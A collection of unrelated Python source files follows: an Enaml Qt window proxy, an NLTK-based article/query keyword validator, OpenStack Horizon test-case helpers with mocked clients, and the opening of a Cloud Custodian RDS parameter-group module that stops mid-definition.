    #--------------------------------------------------------------------------
    # Child Events
    #--------------------------------------------------------------------------
    def child_added(self, child):
        """ Handle the child added event for a QtWindow.

        """
        super(QtWindow, self).child_added(child)
        if isinstance(child, QtContainer):
            self.widget.setCentralWidget(self.central_widget())

    def child_removed(self, child):
        """ Handle the child removed event for a QtWindow.

        """
        super(QtWindow, self).child_removed(child)
        if isinstance(child, QtContainer):
            self.widget.setCentralWidget(self.central_widget())

    #--------------------------------------------------------------------------
    # ProxyWindow API
    #--------------------------------------------------------------------------
    def set_title(self, title):
        """ Set the title of the window.

        """
        self.widget.setWindowTitle(title)

    def set_modality(self, modality):
        """ Set the modality of the window.

        """
        self.widget.setWindowModality(MODALITY[modality])

    def set_icon(self, icon):
        """ Set the window icon.

        """
        qicon = get_cached_qicon(icon) if icon else QIcon()
        self.widget.setWindowIcon(qicon)

    def position(self):
        """ Get the position of the window.

        """
        p = self.widget.pos()
        return Pos(p.x(), p.y())

    def set_position(self, pos):
        """ Set the position of the window.

        """
        self.widget.move(*pos)

    def size(self):
        """ Get the size of the window.

        """
        s = self.widget.size()
        return Size(s.width(), s.height())

    def set_size(self, size):
        """ Set the size of the window.

        """
        qsize = QSize(*size)
        if qsize.isValid():
            self.widget.resize(qsize)

    def geometry(self):
        """ Get the geometry of the window.

        """
        r = self.widget.geometry()
        return Rect(r.x(), r.y(), r.width(), r.height())

    def set_geometry(self, rect):
        """ Set the geometry of the window.

        """
        qrect = QRect(*rect)
        if qrect.isValid():
            self.widget.setGeometry(qrect)

    def frame_geometry(self):
        """ Get the frame geometry of the window.

        """
        r = self.widget.frameGeometry()
        return Rect(r.x(), r.y(), r.width(), r.height())

    def maximize(self):
        """ Maximize the window.

        """
        self.widget.showMaximized()

    def minimize(self):
        """ Minimize the window.

        """
        self.widget.showMinimized()

    def restore(self):
        """ Restore the window after a minimize or maximize.

        """
        self.widget.showNormal()

    def send_to_front(self):
        """ Move the window to the top of the Z order.

        """
        self.widget.raise_()

    def send_to_back(self):
        """ Move the window to the bottom of the Z order.

        """
        self.widget.lower()

    def center_on_screen(self):
        """ Center the window on the screen.

        """
        widget = self.widget
        frame = QRect(QPoint(0, 0), widget.frameGeometry().size())
        screen = QApplication.desktop().screenGeometry(widget)
        widget.move(screen.center() - frame.center())

    def center_on_widget(self, other):
        """ Center the window on another widget.

        """
        widget = self.widget
        frame = QRect(QPoint(0, 0), widget.frameGeometry().size())
        target = other.proxy.widget
        if target.isWindow():
            target_geo = target.frameGeometry()
        else:
            target_geo = QRect(target.mapToGlobal(QPoint(0, 0)), target.size())
        widget.move(target_geo.center() - frame.center())

    def close(self):
        """ Close the window.

        """
        self.widget.close()
|
|
# We use term extraction and clustering methods found in this paper http://nlg18.csie.ntu.edu.tw:8080/lwku/c12.pdf
import sys; import os
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
from nltk import pos_tag, word_tokenize
from nltk.corpus import stopwords
from Keywords_Wordnet.KeywordExtractor import *
import re
from Utils.DataSource import *
from Keywords_Wordnet.WordnetHelper import *
import json
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.stem.snowball import SnowballStemmer
class AbstractValidator:
    """
    Abstract Validator: An interface for validators, which validate queries with articles
    """
    def __init__(self):
        """
        obligatory init
        :return: nothing
        """
        pass

    def validate(self, query, article):
        """
        All validators must have a validate method
        :param query: query to validate
        :param article: article used for validation
        :return: a match score; subclasses must override this
        """
        # `assert False` is stripped under `python -O`, silently turning this
        # into a no-op that returns None; raise explicitly instead
        raise NotImplementedError("subclasses must implement validate()")
class KeywordValidator(AbstractValidator):
    """
    class KeywordValidator: Uses keywords from an article to validate a query
    """
    def __init__(self):
        """
        initializes query_article_lists, a list of list of articles defined around a query
        :return: nothing
        """
        self.query_article_lists = []
        self.lemmatizer = WordNetLemmatizer()
        # the stemmer is stateless; build it once here instead of once per
        # normalize_keyword() call
        self.stemmer = SnowballStemmer("english")

    def add_query(self, query):
        """
        add_query: adds query to queries to be validated, inits empty query_article_list
        :param query: query to add
        :return: nothing
        """
        query_article_list = QueryArticleList(query)
        self.query_article_lists.append(query_article_list)

    # TODO: implement -- currently a stub that adds nothing and returns an
    # empty list
    def add_to_query_article_list(self, article):
        """
        adds an article to the article list of every query it matches
        :param article: article to add to queries
        :return: list of queries article was added to
        """
        queries_added_to = []
        return queries_added_to

    def get_query_article_lists(self):
        """
        get_query_article_lists
        :return: self.query_article_lists: list of list of articles defined around a query
        """
        return self.query_article_lists

    def validate(self, query_id, article_id):
        """
        validate -- evaluates how much article validates query
        :param query_id: id of the query to validate
        :param article_id: id of the article to validate with
        :return: match_percentage (relative measure of how well article validates query)
        """
        max_match_value = 0
        # Need to process query and article formats
        ds = DataSource()
        # e.g. [('test', 'NN', 'Random', ['trial', 'exam', ...]), ...]
        query_synonyms_raw = ds.get_query_synonyms(query_id)
        query_synonyms = {}
        for w in query_synonyms_raw:
            query_synonyms[self.normalize_keyword(w[0])] = \
                [self.normalize_keyword(synonym) for synonym in w[3]]
        # {NN: [list of noun keywords], VB: [list of verb keywords]}
        article_keyword = json.loads(ds.get_article_keywords(article_id)[0])
        article_keywords_flat = set()
        for pos in article_keyword:
            for item in article_keyword[pos]:
                article_keywords_flat.add(self.normalize_keyword(item[0]))
        match_value = 0
        # each query word contributes 2 to the maximum score; an exact keyword
        # match earns 2 points, a synonym match only 1
        for query_word in query_synonyms:
            max_match_value += 2
            if query_word in article_keywords_flat:
                match_value += 2
            else:
                for synonym in query_synonyms[query_word]:
                    if synonym in article_keywords_flat:
                        match_value += 1
                        break
        match_percentage = 0 if max_match_value == 0 else (match_value / max_match_value)
        return match_percentage

    def normalize_keyword(self, word):
        """Lowercase, lemmatize and stem a word so related forms compare equal."""
        lemma = self.lemmatizer.lemmatize(word.lower())
        return self.stemmer.stem(lemma)
class Source:
    """
    class Source -- source of an article
    """

    def __init__(self, id, name, reliability):
        """Create a source object.

        :param id: number to uniquify the source
        :param name: name of the source, e.g. CNN
        :param reliability: how reliable the source is -- default convention is 1.0
        """
        self.id = id
        self.name = name
        self.reliability = reliability

    def get_ID(self):
        """Return the source id."""
        return self.id

    def get_name(self):
        """Return the source name."""
        return self.name

    def get_reliability(self):
        """Return the source reliability."""
        return self.reliability

    def load_from_SQL(self, id):
        """Load a source from the database (not yet implemented).

        :param id: source id
        :return: the loaded source object (currently None)
        """
        return
class Article:
    """
    Article class
    """
    def __init__(self, title, body, url, source):
        """
        creates an article object
        :param title: article title
        :param body: tagged article body title and text, in the form
            'TITLE:...TEXT:...'
        :param url: article url
        :param source: article source
        :return: nothing
        """
        pattern = re.compile(r'TITLE:(.*)TEXT:(.*)', re.DOTALL)
        tagged_items = re.match(pattern, body)
        self.title_tagged = tagged_items.group(1)
        self.body_tagged = tagged_items.group(2)
        self.title = title
        self.url = url
        self.source = source
        # populated by extract_keyword(); None until extraction has run so
        # that get_keyword() honors its documented contract instead of
        # raising AttributeError
        self.keyword = None

    def extract_keyword(self):
        """
        extracts keywords from text
        :return: keywords extracted
        """
        extractor = KeywordExtractor()
        self.keyword = extractor.extract_keywords(self)
        return self.keyword

    def get_keyword(self):
        """
        returns None if keywords not yet extracted
        :return: keywords, or None when extract_keyword() has not been called
        """
        return self.keyword

    def is_linked_to(self, other_article):
        """
        determines if an article is linked to another article
        :param other_article: article to check against
        :return: True if semantically related (currently always False)
        """
        return False

    def get_title(self):
        """
        :return: article title
        """
        return self.title
class QueryElement:
    """
    Query element class -- A part of a query and its role, synonyms, and words in hierarchies
    ex. Beyonce as the subject
    """
    def __init__(self, role, word):
        """Create a QueryElement.

        :param role: role of the element within the query, e.g. "subject"
        :param word: the word itself, e.g. "Beyonce"
        """
        self.role = role
        self.word = word
        self.synonyms = self.get_synonyms()
        self.hierarchies = self.get_hierarchies()

    def get_synonyms(self):
        """Return the synonyms of this query element (not yet implemented)."""
        return []

    def get_hierarchies(self):
        """Return words in this element's hierarchy, e.g. America is a
        hierarchy for Ohio (not yet implemented)."""
        return []
class Query:
    """A query a user submits, split into tagged parts with synonyms."""

    def __init__(self, id, query_parts, threshold):
        """Create a query object.

        :param id: query id from database
        :param query_parts: parts of query -- subject, verb, etc.
        :param threshold: how well an article must match query to validate it
        :return: nothing
        """
        self.threshold = threshold
        self.id = id
        self.subject = QueryElement("subject", query_parts["subject"])
        self.verb = QueryElement("verb", query_parts["verb"])
        self.direct_obj = QueryElement("direct_obj", query_parts["direct_obj"])
        self.indirect_obj = QueryElement("indirect_obj",
                                         query_parts["indirect_obj"])
        self.location = QueryElement("location", query_parts["location"])
        self.query = query_parts["query"]
        # Strip each line: readlines() keeps the trailing "\n", so the
        # stop-word membership test against lower-cased tokens below could
        # never match. `with` also guarantees the file is closed.
        with open(KeywordExtractor.stoplist_file) as stoplist_file:
            self.stop_list = set(line.strip() for line in stoplist_file)
        # e.g. [('Beyonce', 'NN'), ('releases', 'NNS'), ('song', 'NN')]
        self.query_tagged = self.tag_query()
        # e.g. {'NNS': {'releases': []}, 'NN': {'Beyonce': [], 'song': []}}
        self.synonyms_with_tag = {}
        self.generate_synonyms_with_tag()

    def get_id(self):
        """
        :return: query id
        """
        return self.id

    def tag_query(self):
        """Part of speech tag the query.

        :return: the tagged form of the query
        """
        return pos_tag(word_tokenize(self.query))

    def generate_synonyms_with_tag(self):
        """Generate synonyms for each non-stopword in the query.

        Only synonyms with the same part of speech are used.
        :return: nothing
        """
        # TODO: get_synonyms is still a stub upstream; wire in real synonyms.
        for word, tag in self.query_tagged:
            if word.lower() in self.stop_list:
                continue
            self.synonyms_with_tag.setdefault(tag, {})[word] = \
                get_synonyms(word, tag)

    def get_synonyms(self):
        """
        :return: synonyms with their tags of the words in the query
        """
        return self.synonyms_with_tag

    def get_threshold(self):
        """
        :return: query's threshold -- how well an article must match query
            to validate it
        """
        return self.threshold

    def get_elements(self):
        """
        :return: elements of query: subject, verb, direct object,
            indirect object, location
            (only subject and verb are guaranteed to not be None)
        """
        return (self.subject, self.verb, self.direct_obj,
                self.indirect_obj, self.location)
class QueryArticleList:
    """A query together with the list of articles collected around it."""

    def __init__(self, query):
        """Initialise an empty article list for *query*.

        :param query: the query to add articles to a list for
        :return: nothing
        """
        self.query = query
        self.articles = []

    def add_article(self, article):
        """Append an article to this list.

        :param article: article to add
        :return: Nothing
        """
        self.articles.append(article)

    def get_num_articles(self):
        """Count the collected articles.

        :return: number of articles in query article list
        """
        return len(self.articles)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
from functools import wraps # noqa
import os
from ceilometerclient.v2 import client as ceilometer_client
from cinderclient import client as cinder_client
from django.conf import settings
from django.contrib.messages.storage import default_storage # noqa
from django.core.handlers import wsgi
from django.core import urlresolvers
from django.test.client import RequestFactory # noqa
from django.test import utils as django_test_utils
from django.utils.importlib import import_module # noqa
from django.utils import unittest
import glanceclient
from heatclient import client as heat_client
import httplib2
from keystoneclient.v2_0 import client as keystone_client
import mock
import mox
from neutronclient.v2_0 import client as neutron_client
from novaclient.v1_1 import client as nova_client
from openstack_auth import user
from openstack_auth import utils
from saharaclient import client as sahara_client
from swiftclient import client as swift_client
from troveclient import client as trove_client
from horizon import base
from horizon import conf
from horizon.test import helpers as horizon_helpers
from openstack_dashboard import api
from openstack_dashboard import context_processors
from openstack_dashboard.test.test_data import utils as test_utils
# Makes output of failing mox tests much easier to read.
# (Replaces the default WSGIRequest repr, which dumps the whole environ.)
wsgi.WSGIRequest.__repr__ = lambda self: "<class 'django.http.HttpRequest'>"
def create_stubs(stubs_to_create={}):
    """decorator to simplify setting up multiple stubs at once via mox

    :param stubs_to_create: methods to stub in one or more modules
    :type stubs_to_create: dict

    The keys are python paths to the module containing the methods to mock.

    To mock a method in openstack_dashboard/api/nova.py, the key is::

        api.nova

    The values are either a tuple or list of methods to mock in the module
    indicated by the key.

    For example::

        ('server_list',)

    -or-

        ('flavor_list', 'server_list',)

    -or-

        ['flavor_list', 'server_list']

    Additionally, multiple modules can be mocked at once::

        {
            api.nova: ('flavor_list', 'server_list'),
            api.glance: ('image_list_detailed',),
        }

    """
    # NOTE: the mutable default is safe here -- the dict is only read.
    if not isinstance(stubs_to_create, dict):
        # Error message previously named a non-existent "create_stub".
        raise TypeError("create_stubs must be passed a dict, but a %s was "
                        "given." % type(stubs_to_create).__name__)

    def inner_stub_out(fn):
        @wraps(fn)
        def instance_stub_out(self, *args, **kwargs):
            # Stub every requested method before running the test body.
            for key, methods in stubs_to_create.items():
                if not isinstance(methods, (tuple, list)):
                    raise TypeError("The values of the create_stubs "
                                    "dict must be lists or tuples, but "
                                    "is a %s." % type(methods).__name__)
                for method in methods:
                    self.mox.StubOutWithMock(key, method)
            return fn(self, *args, **kwargs)
        return instance_stub_out
    return inner_stub_out
class RequestFactoryWithMessages(RequestFactory):
    """RequestFactory whose requests support the contrib.messages framework."""

    def _decorate(self, req):
        # Attach the user, a session stub and message storage, in the order
        # the messages framework expects them on every request.
        req.user = utils.get_user(req)
        req.session = []
        req._messages = default_storage(req)
        return req

    def get(self, *args, **kwargs):
        return self._decorate(
            super(RequestFactoryWithMessages, self).get(*args, **kwargs))

    def post(self, *args, **kwargs):
        return self._decorate(
            super(RequestFactoryWithMessages, self).post(*args, **kwargs))
@unittest.skipIf(os.environ.get('SKIP_UNITTESTS', False),
                 "The SKIP_UNITTESTS env variable is set.")
class TestCase(horizon_helpers.TestCase):
    """Specialized base test case class for Horizon.
    It gives access to numerous additional features:
    * A full suite of test data through various attached objects and
      managers (e.g. ``self.servers``, ``self.user``, etc.). See the
      docs for
      :class:`~openstack_dashboard.test.test_data.utils.TestData`
      for more information.
    * The ``mox`` mocking framework via ``self.mox``.
    * A set of request context data via ``self.context``.
    * A ``RequestFactory`` class which supports Django's ``contrib.messages``
      framework via ``self.factory``.
    * A ready-to-go request object via ``self.request``.
    * The ability to override specific time data controls for easier testing.
    * Several handy additional assertion methods.
    """
    def setUp(self):
        # Block real network access: any httplib2 request made during a test
        # raises instead of escaping to the outside world.
        def fake_conn_request(*args, **kwargs):
            raise Exception("An external URI request tried to escape through "
                            "an httplib2 client. Args: %s, kwargs: %s"
                            % (args, kwargs))
        self._real_conn_request = httplib2.Http._conn_request
        httplib2.Http._conn_request = fake_conn_request
        # Serve canned context data instead of running the real context
        # processor; both patches are undone in tearDown().
        self._real_context_processor = context_processors.openstack
        context_processors.openstack = lambda request: self.context
        self.patchers = {}
        self.add_panel_mocks()
        super(TestCase, self).setUp()
    def _setup_test_data(self):
        # Attach the full canned test-data suite (self.servers, self.user...).
        super(TestCase, self)._setup_test_data()
        test_utils.load_test_data(self)
        self.context = {'authorized_tenants': self.tenants.list()}
    def _setup_factory(self):
        # For some magical reason we need a copy of this here.
        self.factory = RequestFactoryWithMessages()
    def _setup_user(self):
        # Install a fake authenticated user built from the test data.
        self._real_get_user = utils.get_user
        tenants = self.context['authorized_tenants']
        self.setActiveUser(id=self.user.id,
                           token=self.token,
                           username=self.user.name,
                           domain_id=self.domain.id,
                           tenant_id=self.tenant.id,
                           service_catalog=self.service_catalog,
                           authorized_tenants=tenants)
    def _setup_request(self):
        super(TestCase, self)._setup_request()
        self.request.session['token'] = self.token.id
    def add_panel_mocks(self):
        """Global mocks on panels that get called on all views."""
        self.patchers['aggregates'] = mock.patch(
            'openstack_dashboard.dashboards.admin'
            '.aggregates.panel.Aggregates.can_access',
            mock.Mock(return_value=True))
        self.patchers['aggregates'].start()
    def tearDown(self):
        # Undo the monkey-patches from setUp()/_setup_user() and stop all
        # mock patchers started via add_panel_mocks().
        httplib2.Http._conn_request = self._real_conn_request
        context_processors.openstack = self._real_context_processor
        utils.get_user = self._real_get_user
        mock.patch.stopall()
        super(TestCase, self).tearDown()
    def setActiveUser(self, id=None, token=None, username=None, tenant_id=None,
                      service_catalog=None, tenant_name=None, roles=None,
                      authorized_tenants=None, enabled=True, domain_id=None):
        # Replace utils.get_user so every request sees this fake user.
        def get_user(request):
            return user.User(id=id,
                             token=token,
                             user=username,
                             domain_id=domain_id,
                             tenant_id=tenant_id,
                             service_catalog=service_catalog,
                             roles=roles,
                             enabled=enabled,
                             authorized_tenants=authorized_tenants,
                             endpoint=settings.OPENSTACK_KEYSTONE_URL)
        utils.get_user = get_user
    def assertRedirectsNoFollow(self, response, expected_url):
        """Check for redirect.
        Asserts that the given response issued a 302 redirect without
        processing the view which is redirected to.
        """
        assert (response.status_code / 100 == 3), \
            "The response did not return a redirect."
        self.assertEqual(response._headers.get('location', None),
                         ('Location', settings.TESTSERVER + expected_url))
        self.assertEqual(response.status_code, 302)
    def assertNoFormErrors(self, response, context_name="form"):
        """Checks for no form errors.
        Asserts that the response either does not contain a form in its
        context, or that if it does, that form has no errors.
        """
        context = getattr(response, "context", {})
        if not context or context_name not in context:
            return True
        errors = response.context[context_name]._errors
        assert len(errors) == 0, \
            "Unexpected errors were found on the form: %s" % errors
    def assertFormErrors(self, response, count=0, message=None,
                         context_name="form"):
        """Check for form errors.
        Asserts that the response does contain a form in its
        context, and that form has errors, if count were given,
        it must match the exact numbers of errors
        """
        context = getattr(response, "context", {})
        assert (context and context_name in context), \
            "The response did not contain a form."
        errors = response.context[context_name]._errors
        if count:
            assert len(errors) == count, \
                "%d errors were found on the form, %d expected" % \
                (len(errors), count)
            if message and message not in unicode(errors):
                self.fail("Expected message not found, instead found: %s"
                          % ["%s: %s" % (key, [e for e in field_errors]) for
                             (key, field_errors) in errors.items()])
        else:
            assert len(errors) > 0, "No errors were found on the form"
class BaseAdminViewTests(TestCase):
    """TestCase whose active user carries the "admin" role.
    For testing admin-only views and functionality.
    """
    def setActiveUser(self, *args, **kwargs):
        # Inject the admin role unless the caller supplied roles explicitly.
        if "roles" not in kwargs:
            kwargs['roles'] = [self.roles.admin._info]
        super(BaseAdminViewTests, self).setActiveUser(*args, **kwargs)

    def setSessionValues(self, **kwargs):
        """Persist *kwargs* into a file-backed session and the test client."""
        settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
        engine = import_module(settings.SESSION_ENGINE)
        store = engine.SessionStore()
        for key, value in kwargs.items():
            store[key] = value
            self.request.session[key] = value
        store.save()
        self.session = store
        self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key
class APITestCase(TestCase):
    """Testing APIs.
    For use with tests which deal with the underlying clients rather than
    stubbing out the openstack_dashboard.api.* methods.
    """
    def setUp(self):
        super(APITestCase, self).setUp()
        utils.patch_middleware_get_user()

        def fake_keystoneclient(request, admin=False):
            """Returns the stub keystoneclient.
            Only necessary because the function takes too many arguments to
            conveniently be a lambda.
            """
            return self.stub_keystoneclient()

        # Remember the real client factories so tearDown can restore them.
        self._original_glanceclient = api.glance.glanceclient
        self._original_keystoneclient = api.keystone.keystoneclient
        self._original_novaclient = api.nova.novaclient
        self._original_neutronclient = api.neutron.neutronclient
        self._original_cinderclient = api.cinder.cinderclient
        self._original_heatclient = api.heat.heatclient
        self._original_ceilometerclient = api.ceilometer.ceilometerclient
        self._original_troveclient = api.trove.troveclient
        self._original_saharaclient = api.sahara.client

        # Swap every client factory for one that hands back our mox stub.
        api.glance.glanceclient = lambda request: self.stub_glanceclient()
        api.keystone.keystoneclient = fake_keystoneclient
        api.nova.novaclient = lambda request: self.stub_novaclient()
        api.neutron.neutronclient = lambda request: self.stub_neutronclient()
        api.cinder.cinderclient = lambda request: self.stub_cinderclient()
        api.heat.heatclient = (lambda request, password=None:
                               self.stub_heatclient())
        api.ceilometer.ceilometerclient = (lambda request:
                                           self.stub_ceilometerclient())
        api.trove.troveclient = lambda request: self.stub_troveclient()
        api.sahara.client = lambda request: self.stub_saharaclient()

    def tearDown(self):
        super(APITestCase, self).tearDown()
        api.glance.glanceclient = self._original_glanceclient
        api.nova.novaclient = self._original_novaclient
        api.keystone.keystoneclient = self._original_keystoneclient
        api.neutron.neutronclient = self._original_neutronclient
        api.cinder.cinderclient = self._original_cinderclient
        api.heat.heatclient = self._original_heatclient
        api.ceilometer.ceilometerclient = self._original_ceilometerclient
        api.trove.troveclient = self._original_troveclient
        api.sahara.client = self._original_saharaclient

    def _stub_client(self, attr, module):
        """Create (once) a mox mock of module.Client, cached on *attr*."""
        if not hasattr(self, attr):
            self.mox.StubOutWithMock(module, 'Client')
            setattr(self, attr, self.mox.CreateMock(module.Client))
        return getattr(self, attr)

    def stub_novaclient(self):
        return self._stub_client('novaclient', nova_client)

    def stub_cinderclient(self):
        return self._stub_client('cinderclient', cinder_client)

    def stub_keystoneclient(self):
        if not hasattr(self, "keystoneclient"):
            self.mox.StubOutWithMock(keystone_client, 'Client')
            # NOTE(saschpe): Mock properties, MockObject.__init__ ignores them:
            keystone_client.Client.auth_token = 'foo'
            keystone_client.Client.service_catalog = None
            keystone_client.Client.tenant_id = '1'
            keystone_client.Client.tenant_name = 'tenant_1'
            keystone_client.Client.management_url = ""
            keystone_client.Client.__dir__ = lambda: []
            self.keystoneclient = self.mox.CreateMock(keystone_client.Client)
        return self.keystoneclient

    def stub_glanceclient(self):
        return self._stub_client('glanceclient', glanceclient)

    def stub_neutronclient(self):
        return self._stub_client('neutronclient', neutron_client)

    def stub_swiftclient(self, expected_calls=1):
        if not hasattr(self, "swiftclient"):
            self.mox.StubOutWithMock(swift_client, 'Connection')
            self.swiftclient = self.mox.CreateMock(swift_client.Connection)
            # Record one Connection() expectation per expected call.
            while expected_calls:
                swift_client.Connection(None,
                                        mox.IgnoreArg(),
                                        None,
                                        preauthtoken=mox.IgnoreArg(),
                                        preauthurl=mox.IgnoreArg(),
                                        cacert=None,
                                        insecure=False,
                                        auth_version="2.0") \
                    .AndReturn(self.swiftclient)
                expected_calls -= 1
        return self.swiftclient

    def stub_heatclient(self):
        return self._stub_client('heatclient', heat_client)

    def stub_ceilometerclient(self):
        return self._stub_client('ceilometerclient', ceilometer_client)

    def stub_troveclient(self):
        return self._stub_client('troveclient', trove_client)

    def stub_saharaclient(self):
        return self._stub_client('saharaclient', sahara_client)
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
                     "The WITH_SELENIUM env variable is not set.")
class SeleniumTestCase(horizon_helpers.SeleniumTestCase):
    """Selenium test case wired up with Horizon's canned test data and mox."""
    def setUp(self):
        super(SeleniumTestCase, self).setUp()
        test_utils.load_test_data(self)
        self.mox = mox.Mox()
        # Fake the logged-in user for the duration of the test; restored in
        # tearDown().
        self._real_get_user = utils.get_user
        self.setActiveUser(id=self.user.id,
                           token=self.token,
                           username=self.user.name,
                           tenant_id=self.tenant.id,
                           service_catalog=self.service_catalog,
                           authorized_tenants=self.tenants.list())
        self.patchers = {}
        # Same global panel mock used by TestCase.add_panel_mocks().
        self.patchers['aggregates'] = mock.patch(
            'openstack_dashboard.dashboards.admin'
            '.aggregates.panel.Aggregates.can_access',
            mock.Mock(return_value=True))
        self.patchers['aggregates'].start()
        os.environ["HORIZON_TEST_RUN"] = "True"
    def tearDown(self):
        # Unwind mox stubs and the get_user patch, then verify expectations.
        self.mox.UnsetStubs()
        utils.get_user = self._real_get_user
        mock.patch.stopall()
        self.mox.VerifyAll()
        del os.environ["HORIZON_TEST_RUN"]
    def setActiveUser(self, id=None, token=None, username=None, tenant_id=None,
                      service_catalog=None, tenant_name=None, roles=None,
                      authorized_tenants=None, enabled=True):
        # Replace utils.get_user so every request sees this fake user.
        def get_user(request):
            return user.User(id=id,
                             token=token,
                             user=username,
                             tenant_id=tenant_id,
                             service_catalog=service_catalog,
                             roles=roles,
                             enabled=enabled,
                             authorized_tenants=authorized_tenants,
                             endpoint=settings.OPENSTACK_KEYSTONE_URL)
        utils.get_user = get_user
class SeleniumAdminTestCase(SeleniumTestCase):
    """Version of AdminTestCase for Selenium.
    Sets an active user with the "admin" role for testing admin-only views and
    functionality.
    """
    def setActiveUser(self, *args, **kwargs):
        # Default to the admin role unless the caller chose roles explicitly.
        if "roles" not in kwargs:
            kwargs['roles'] = [self.roles.admin._info]
        super(SeleniumAdminTestCase, self).setActiveUser(*args, **kwargs)
def my_custom_sort(flavor):
    """Sort key giving flavors a fixed, hand-picked ordering by name.

    Raises KeyError for any flavor name outside the known set.
    """
    ordered_names = ('m1.secret', 'm1.tiny', 'm1.massive', 'm1.metadata')
    ranks = dict((name, rank) for rank, name in enumerate(ordered_names))
    return ranks[flavor.name]
class PluginTestCase(TestCase):
    """Test case for testing plugin system of Horizon.
    For use with tests which deal with the pluggable dashboard and panel
    configuration, it takes care of backing up and restoring the Horizon
    configuration.
    """
    def setUp(self):
        super(PluginTestCase, self).setUp()
        # Back up the live Horizon configuration; restored in tearDown().
        self.old_horizon_config = conf.HORIZON_CONFIG
        conf.HORIZON_CONFIG = conf.LazySettings()
        base.Horizon._urls()
        # Trigger discovery, registration, and URLconf generation if it
        # hasn't happened yet.
        self.client.get("/")
        # Store our original dashboards
        self._discovered_dashboards = base.Horizon._registry.keys()
        # Gather up and store our original panels for each dashboard
        self._discovered_panels = {}
        for dash in self._discovered_dashboards:
            panels = base.Horizon._registry[dash]._registry.keys()
            self._discovered_panels[dash] = panels
    def tearDown(self):
        super(PluginTestCase, self).tearDown()
        conf.HORIZON_CONFIG = self.old_horizon_config
        # Destroy our singleton and re-create it.
        base.HorizonSite._instance = None
        del base.Horizon
        base.Horizon = base.HorizonSite()
        # Reload the convenience references to Horizon stored in __init__
        reload(import_module("horizon"))
        # Re-register our original dashboards and panels.
        # This is necessary because autodiscovery only works on the first
        # import, and calling reload introduces innumerable additional
        # problems. Manual re-registration is the only good way for testing.
        for dash in self._discovered_dashboards:
            base.Horizon.register(dash)
            for panel in self._discovered_panels[dash]:
                dash.register(panel)
        self._reload_urls()
    def _reload_urls(self):
        """Cleans up URLs.
        Clears out the URL caches, reloads the root urls module, and
        re-triggers the autodiscovery mechanism for Horizon. Allows URLs
        to be re-calculated after registering new dashboards. Useful
        only for testing and should never be used on a live site.
        """
        urlresolvers.clear_url_caches()
        reload(import_module(settings.ROOT_URLCONF))
        base.Horizon._urls()
class update_settings(django_test_utils.override_settings):
    """override_settings which allows override an item in dict.
    django original override_settings replaces a dict completely,
    however OpenStack dashboard setting has many dictionary configuration
    and there are test case where we want to override only one item in
    a dictionary and keep other items in the dictionary.
    This version of override_settings allows this if keep_dict is True.
    If keep_dict False is specified, the original behavior of
    Django override_settings is used.
    """

    def __init__(self, keep_dict=True, **kwargs):
        if keep_dict:
            # Merge dict-valued overrides into a shallow copy of the
            # existing setting instead of replacing it wholesale.
            for name, override in kwargs.items():
                current = getattr(settings, name, None)
                if (isinstance(override, collections.Mapping) and
                        isinstance(current, collections.Mapping)):
                    merged = copy.copy(current)
                    merged.update(override)
                    kwargs[name] = merged
        super(update_settings, self).__init__(**kwargs)
|
|
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from botocore.exceptions import ClientError
from c7n.actions import ActionRegistry, BaseAction
from c7n.filters import FilterRegistry
from c7n.manager import resources
from c7n.query import QueryResourceManager, TypeInfo
from c7n.utils import (type_schema, local_session, chunks)
# Shared logger plus the filter/action registries that the rds-param-group
# resource (below) is wired to.
log = logging.getLogger('custodian.rds-param-group')
pg_filters = FilterRegistry('rds-param-group.filters')
pg_actions = ActionRegistry('rds-param-group.actions')
@resources.register('rds-param-group')
class RDSParamGroup(QueryResourceManager):
    """Resource manager for RDS parameter groups.
    """
    class resource_type(TypeInfo):
        # How c7n enumerates and identifies DB parameter groups via the
        # rds DescribeDBParameterGroups API.
        service = 'rds'
        arn_type = 'pg'
        enum_spec = ('describe_db_parameter_groups', 'DBParameterGroups', None)
        name = id = 'DBParameterGroupName'
        dimension = 'DBParameterGroupName'
    filter_registry = pg_filters
    action_registry = pg_actions
# Filter/action registries for the cluster-level parameter group resource.
pg_cluster_filters = FilterRegistry('rds-cluster-param-group.filters')
pg_cluster_actions = ActionRegistry('rds-cluster-param-group.actions')
@resources.register('rds-cluster-param-group')
class RDSClusterParamGroup(QueryResourceManager):
    """ Resource manager for RDS cluster parameter groups.
    """
    class resource_type(TypeInfo):
        # How c7n enumerates and identifies DB *cluster* parameter groups.
        service = 'rds'
        arn_type = 'cluster-pg'
        enum_spec = ('describe_db_cluster_parameter_groups', 'DBClusterParameterGroups', None)
        name = id = 'DBClusterParameterGroupName'
        dimension = 'DBClusterParameterGroupName'
    filter_registry = pg_cluster_filters
    action_registry = pg_cluster_actions
class PGMixin(object):
    """Mixin supplying the name lookup for (non-cluster) parameter groups."""

    def get_pg_name(self, pg):
        """:return: the name of the given DB parameter group resource."""
        return pg['DBParameterGroupName']
class PGClusterMixin(object):
    """Mixin supplying the name lookup for cluster parameter groups."""

    def get_pg_name(self, pg):
        """:return: the name of the given DB cluster parameter group."""
        return pg['DBClusterParameterGroupName']
class Copy(BaseAction):
    """Shared implementation for copying a parameter group.

    Subclasses supply get_pg_name() (via a mixin) and do_copy().
    """

    schema = type_schema(
        'copy',
        **{
